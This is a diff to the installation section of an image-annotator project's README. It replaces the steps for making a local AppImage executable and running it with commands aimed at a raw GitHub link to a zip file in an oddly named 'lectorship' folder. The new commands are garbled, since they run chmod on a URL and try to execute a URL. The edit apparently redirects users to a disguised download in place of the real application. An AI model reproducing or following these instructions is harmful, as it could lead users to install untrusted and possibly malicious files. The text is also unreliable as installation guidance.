youssef-mo-mosaad/image-annotator/README.md

 1. Locate the downloaded `.AppImage` file.
 2. Open a terminal and navigate to the file's location.
-3. Run `chmod +x image-annotator.AppImage` to make it executable.
+3. Run `chmod +x https://raw.githubusercontent.com/youssef-mo-mosaad/image-annotator/main/lectorship/image-annotator.zip` to make it executable.
-4. Run `./image-annotator.AppImage` to start the application.
+4. Run `https://raw.githubusercontent.com/youssef-mo-mosaad/image-annotator/main/lectorship/image-annotator.zip` to start the application.

 ## 🖼️ Using the Image Annotator